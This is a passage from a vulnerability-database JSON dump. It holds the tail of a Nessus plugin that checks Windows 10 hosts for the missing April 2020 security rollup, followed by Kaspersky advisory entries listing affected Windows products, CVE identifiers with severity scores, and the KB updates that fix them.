severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18362\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4549951])\n ||\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18363\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4549951])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-08-18T11:04:28", "description": "### *Detect date*:\n04/14/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft products (Extended Support Update). Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information, gain privileges, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1903 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nInternet Explorer 9 \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server, version 1903 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2019 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2016 \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 R2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1709 for 32-bit Systems \nWindows Server, version 1803 (Server Core Installation) \nInternet Explorer 11 \nWindows RT 8.1 \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2019 (Server Core installation) \nWindows 8.1 for x64-based systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2012 \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1709 for ARM64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-0968](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0968>) \n[CVE-2020-0987](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0987>) \n[CVE-2020-0982](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0982>) \n[CVE-2020-0889](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0889>) \n[CVE-2020-0960](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0960>) \n[CVE-2020-0962](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0962>) \n[CVE-2020-1007](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1007>) \n[CVE-2020-0964](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0964>) \n[CVE-2020-0965](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0965>) \n[CVE-2020-0988](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0988>) \n[CVE-2020-0967](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0967>) \n[CVE-2020-0959](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0959>) \n[CVE-2020-1015](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1015>) \n[CVE-2020-1014](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1014>) \n[CVE-2020-0946](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0946>) \n[CVE-2020-1011](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1011>) \n[CVE-2020-1009](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1009>) \n[CVE-2020-0907](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0907>) \n[CVE-2020-0895](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0895>) \n[CVE-2020-1094](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1094>) \n[CVE-2020-0687](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0687>) \n[CVE-2020-0995](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0995>) \n[CVE-2020-0994](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0994>) \n[CVE-2020-0993](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0993>) \n[CVE-2020-0992](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0992>) \n[CVE-2020-0821](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0821>) \n[CVE-2020-0999](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0999>) \n[CVE-2020-1000](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1000>) \n[CVE-2020-0953](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0953>) \n[CVE-2020-0952](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0952>) \n[CVE-2020-1004](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1004>) \n[CVE-2020-1005](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1005>) \n[CVE-2020-0957](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0957>) \n[CVE-2020-0956](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0956>) \n[CVE-2020-1008](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1008>) \n[CVE-2020-0958](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0958>) \n[CVE-2020-1020](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1020>) \n[CVE-2020-1027](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1027>) \n[CVE-2020-0938](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0938>) \n[CVE-2020-0966](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0966>) \n[CVE-2020-0955](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0955>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Server](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Server/>)\n\n### *CVE-IDS*:\n[CVE-2020-0968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0968>)7.6Critical \n[CVE-2020-0987](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0987>)2.1Warning \n[CVE-2020-0982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0982>)2.1Warning \n[CVE-2020-0889](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0889>)9.3Critical \n[CVE-2020-0960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0960>)9.3Critical \n[CVE-2020-0962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0962>)2.1Warning \n[CVE-2020-1007](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1007>)2.1Warning \n[CVE-2020-0964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0964>)9.3Critical \n[CVE-2020-0965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0965>)4.6Warning \n[CVE-2020-0988](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0988>)9.3Critical \n[CVE-2020-0967](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0967>)9.3Critical \n[CVE-2020-0959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0959>)9.3Critical \n[CVE-2020-1015](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1015>)7.2High \n[CVE-2020-1014](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1014>)7.2High \n[CVE-2020-0946](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0946>)4.3Warning \n[CVE-2020-1011](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1011>)7.2High \n[CVE-2020-1009](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1009>)7.2High \n[CVE-2020-0907](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0907>)9.3Critical \n[CVE-2020-0895](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0895>)7.6Critical \n[CVE-2020-1094](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1094>)7.2High \n[CVE-2020-0687](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0687>)9.3Critical \n[CVE-2020-0995](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0995>)9.3Critical \n[CVE-2020-0994](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0994>)9.3Critical \n[CVE-2020-0993](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0993>)6.8High \n[CVE-2020-0992](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0992>)9.3Critical \n[CVE-2020-0821](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0821>)2.1Warning \n[CVE-2020-0999](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0999>)9.3Critical \n[CVE-2020-1000](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1000>)7.2High \n[CVE-2020-0953](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0953>)9.3Critical \n[CVE-2020-0952](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0952>)4.3Warning \n[CVE-2020-1004](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1004>)7.2High \n[CVE-2020-1005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1005>)2.1Warning \n[CVE-2020-0957](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0957>)7.2High \n[CVE-2020-0956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0956>)7.2High \n[CVE-2020-1008](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1008>)9.3Critical \n[CVE-2020-0958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0958>)7.2High \n[CVE-2020-1020](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1020>)6.8High \n[CVE-2020-1027](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1027>)7.2High \n[CVE-2020-0938](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0938>)6.8High \n[CVE-2020-0966](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0966>)9.3Critical \n[CVE-2020-0955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0955>)2.1Warning\n\n### *KB list*:\n[4550951](<http://support.microsoft.com/kb/4550951>) \n[4550964](<http://support.microsoft.com/kb/4550964>) \n[4550957](<http://support.microsoft.com/kb/4550957>) \n[4550905](<http://support.microsoft.com/kb/4550905>) \n[4550965](<http://support.microsoft.com/kb/4550965>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "kaspersky", "title": "KLA11743 Multiple vulnerabilities in Microsoft products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0821", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0938", "CVE-2020-0946", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0957", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0982", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1094"], "modified": "2020-06-18T00:00:00", "id": "KLA11743", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11743/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T11:04:27", "description": "### *Detect date*:\n04/14/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1903 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server, version 1903 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2019 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2016 \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 R2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1709 for 32-bit Systems \nWindows Server, version 1803 (Server Core Installation) \nWindows RT 8.1 \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2019 (Server Core installation) \nWindows 8.1 for x64-based systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2012 \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1709 for ARM64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-0987](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0987>) \n[CVE-2020-0985](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0985>) \n[CVE-2020-0982](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0982>) \n[CVE-2020-0983](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0983>) \n[CVE-2020-0981](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0981>) \n[CVE-2020-0960](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0960>) \n[CVE-2020-0962](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0962>) \n[CVE-2020-0956](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0956>) \n[CVE-2020-0964](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0964>) \n[CVE-2020-0965](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0965>) \n[CVE-2020-0988](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0988>) \n[CVE-2020-0942](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0942>) \n[CVE-2020-0959](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0959>) \n[CVE-2020-1015](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1015>) \n[CVE-2020-1014](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1014>) \n[CVE-2020-0946](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0946>) \n[CVE-2020-0947](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0947>) \n[CVE-2020-1011](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1011>) \n[CVE-2020-0958](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0958>) \n[CVE-2020-0907](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0907>) \n[CVE-2020-0948](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0948>) \n[CVE-2020-0949](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0949>) \n[CVE-2020-0889](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0889>) \n[CVE-2020-0945](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0945>) \n[CVE-2020-1007](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1007>) \n[CVE-2020-1094](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1094>) \n[CVE-2020-0784](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0784>) \n[CVE-2020-0910](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0910>) \n[CVE-2020-1003](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1003>) \n[CVE-2020-0913](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0913>) \n[CVE-2020-0687](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0687>) \n[CVE-2020-0953](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0953>) \n[CVE-2020-1029](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1029>) \n[CVE-2020-0995](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0995>) \n[CVE-2020-0994](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0994>) \n[CVE-2020-0944](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0944>) \n[CVE-2020-0996](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0996>) \n[CVE-2020-0993](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0993>) \n[CVE-2020-0992](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0992>) \n[CVE-2020-0821](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0821>) \n[CVE-2020-0999](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0999>) \n[CVE-2020-1000](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1000>) \n[CVE-2020-0950](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0950>) \n[CVE-2020-0939](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0939>) \n[CVE-2020-0952](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0952>) \n[CVE-2020-0955](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0955>) \n[CVE-2020-0918](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0918>) \n[CVE-2020-1006](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1006>) \n[CVE-2020-0888](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0888>) \n[CVE-2020-1008](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1008>) \n[CVE-2020-1009](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1009>) \n[CVE-2020-0917](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0917>) \n[CVE-2020-0937](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0937>) \n[CVE-2020-1027](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1027>) \n[CVE-2020-0936](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0936>) \n[CVE-2020-0934](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0934>) \n[CVE-2020-1020](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1020>) \n[CVE-2020-1017](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1017>) \n[CVE-2020-1016](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1016>) \n[CVE-2020-0794](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0794>) \n[CVE-2020-0940](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0940>) \n[CVE-2020-0938](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0938>) \n[CVE-2020-1001](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1001>) \n[CVE-2020-1004](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1004>) \n[CVE-2020-0699](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0699>) \n[CVE-2020-1005](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1005>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2020-0987](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0987>)2.1Warning \n[CVE-2020-0982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0982>)2.1Warning \n[CVE-2020-0889](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0889>)9.3Critical \n[CVE-2020-0960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0960>)9.3Critical \n[CVE-2020-0962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0962>)2.1Warning \n[CVE-2020-1007](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1007>)2.1Warning \n[CVE-2020-0964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0964>)9.3Critical \n[CVE-2020-0965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0965>)4.6Warning \n[CVE-2020-0988](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0988>)9.3Critical \n[CVE-2020-0959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0959>)9.3Critical \n[CVE-2020-1015](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1015>)7.2High \n[CVE-2020-1014](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1014>)7.2High \n[CVE-2020-0946](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0946>)4.3Warning \n[CVE-2020-1011](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1011>)7.2High \n[CVE-2020-1009](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1009>)7.2High \n[CVE-2020-0907](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0907>)9.3Critical \n[CVE-2020-1094](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1094>)7.2High \n[CVE-2020-0687](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0687>)9.3Critical \n[CVE-2020-0995](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0995>)9.3Critical \n[CVE-2020-0994](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0994>)9.3Critical \n[CVE-2020-0993](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0993>)6.8High \n[CVE-2020-0992](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0992>)9.3Critical \n[CVE-2020-0821](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0821>)2.1Warning \n[CVE-2020-0999](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0999>)9.3Critical \n[CVE-2020-1000](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1000>)7.2High \n[CVE-2020-0953](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0953>)9.3Critical \n[CVE-2020-0952](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0952>)4.3Warning \n[CVE-2020-1004](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1004>)7.2High \n[CVE-2020-1005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1005>)2.1Warning \n[CVE-2020-0956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0956>)7.2High \n[CVE-2020-1008](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1008>)9.3Critical \n[CVE-2020-0958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0958>)7.2High 